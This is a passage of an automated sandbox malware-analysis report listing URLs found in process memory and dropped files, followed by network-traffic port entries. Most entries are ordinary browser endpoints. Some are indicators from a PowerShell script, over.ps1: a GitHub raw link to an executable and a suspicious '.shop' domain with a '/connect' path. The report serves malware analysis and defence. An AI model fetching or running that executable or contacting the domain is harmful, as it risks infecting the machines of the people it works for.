    Source: chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
    Source: chrome.exe, 00000014.00000003.2498249495.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497415752.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497672608.000018080150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497581747.0000180801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498456144.0000180801538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497532369.00001808014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498282013.0000180801470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
    Source: chrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
    Source: chrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
    Source: chrome.exe, 00000014.00000003.2511525180.000040D800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
    Source: chrome.exe, 00000014.00000003.2470461389.000040D800878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
    Source: chrome.exe, 00000014.00000003.2469850704.000040D80071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
    Source: chrome.exe, 00000014.00000003.2498249495.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497415752.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497672608.000018080150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497581747.0000180801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498456144.0000180801538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497532369.00001808014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498282013.0000180801470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
    Source: msedge.exe, 0000001D.00000002.2786876593.00006510002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
    Source: msedge.exe, 0000001D.00000002.2786876593.00006510002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
    Source: Cookies.32.drString found in binary or memory: https://msn.comXID/
    Source: Cookies.32.drString found in binary or memory: https://msn.comXIDv10
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
    Source: chrome.exe, 00000014.00000003.2482529350.0000180801058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
    Source: 000003.log1.31.dr, 2cc80dabc69f58b6_0.31.drString found in binary or memory: https://ntp.msn.com
    Source: 000003.log.31.drString found in binary or memory: https://ntp.msn.com/
    Source: 000003.log.31.drString found in binary or memory: https://ntp.msn.com/0
    Source: QuotaManager.31.drString found in binary or memory: https://ntp.msn.com/_default
    Source: 000003.log.31.dr, 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://ntp.msn.com/edge/ntp
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
    Source: Session_13380134359610106.31.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
    Source: QuotaManager.31.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
    Source: 2cc80dabc69f58b6_0.31.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: msedge.exe, 0000001D.00000002.2786876593.00006510002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
    Source: chrome.exe, 00000014.00000003.2498134058.000018080148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
    Source: chrome.exe, 00000014.00000003.2523972155.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyn
    Source: chrome.exe, 00000014.00000003.2498532148.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
    Source: chrome.exe, 00000014.00000003.2498134058.000018080148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
    Source: chrome.exe, 00000014.00000003.2498134058.000018080148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
    Source: qmgr.db.21.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
    Source: chrome.exe, 00000014.00000003.2480488148.00001808009BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
    Source: msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
    Source: msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
    Source: msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
    Source: chrome.exe, 00000014.00000003.2482529350.0000180801058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
    Source: chrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
    Source: chromecache_493.22.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
    Source: chromecache_490.22.drString found in binary or memory: https://plus.google.com
    Source: chromecache_490.22.drString found in binary or memory: https://plus.googleapis.com
    Source: chrome.exe, 00000014.00000003.2482529350.0000180801058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: powershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
    Source: powershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmp, over.ps1String found in binary or memory: https://raw.githubusercontent.com/rk2026/civil/refs/heads/main/MatAugust.exe
    Source: powershell.exe, 00000000.00000002.2133357506.000002410224A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://saaadnesss.shop
    Source: powershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmp, over.ps1String found in binary or memory: https://saaadnesss.shop/connect
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://sb.scorecardresearch.com/
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://srtb.msn.cn/
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://srtb.msn.com/
    Source: chrome.exe, 00000014.00000003.2497483640.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: chrome.exe, 00000014.00000003.2498249495.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497415752.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497672608.000018080150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497581747.0000180801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498456144.0000180801538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497532369.00001808014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498282013.0000180801470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.31.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.31.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.31.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
    Source: chromecache_490.22.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
    Source: k6fcj5.17.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
    Source: Passenger.13.dr, Stopped.com.6.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: k6fcj5.17.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
    Source: fcbaaa.17.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
    Source: Stopped.com.6.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0...g?
    Source: chrome.exe, 00000014.00000003.2489866011.00001808002AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497483640.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
    Source: chrome.exe, 00000014.00000003.2489866011.00001808002AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497483640.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: chrome.exe, 00000014.00000003.2497483640.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: chrome.exe, 00000014.00000003.2479306917.0000180800DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2480335285.0000180800D7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
    Source: content.js.31.dr, content_new.js.31.drString found in binary or memory: https://www.google.com/chrome
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
    Source: aie3w4.17.dr, Web Data.31.dr, fcbaaa.17.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: chrome.exe, 00000014.00000003.2498249495.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497415752.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497672608.000018080150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497581747.0000180801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498456144.0000180801538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497532369.00001808014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498282013.0000180801470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
    Source: chrome.exe, 00000014.00000003.2498134058.000018080148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
    Source: chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
    Source: chrome.exe, 00000014.00000003.2489866011.00001808002AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
    Source: chromecache_490.22.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
    Source: chromecache_490.22.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
    Source: chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
    Source: chrome.exe, 00000014.00000003.2497483640.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: chrome.exe, 00000014.00000003.2497483640.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: chromecache_493.22.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
    Source: chromecache_493.22.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
    Source: chromecache_493.22.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
    Source: chrome.exe, 00000014.00000003.2498282013.0000180801470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000014.00000003.2497986932.00001808010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498012771.00001808014A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498249495.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2497415752.0000180801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498456144.0000180801538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498282013.0000180801470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000014.00000003.2498134058.000018080148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
    Source: chrome.exe, 00000014.00000003.2498134058.000018080148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
    Source: 2cc80dabc69f58b6_1.31.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
    Source: chrome.exe, 00000014.00000003.2520909762.0000180801C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: chrome.exe, 00000014.00000003.2521090873.0000180801C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2520909762.0000180801C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/3
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
    Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64413 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 64436 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
    Source: unknownNetwork traffic detected: HTTP traffic on port 64416 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
    Source: unknownNetwork traffic detected: HTTP traffic on port 64421 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 64429 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64415 -> 443
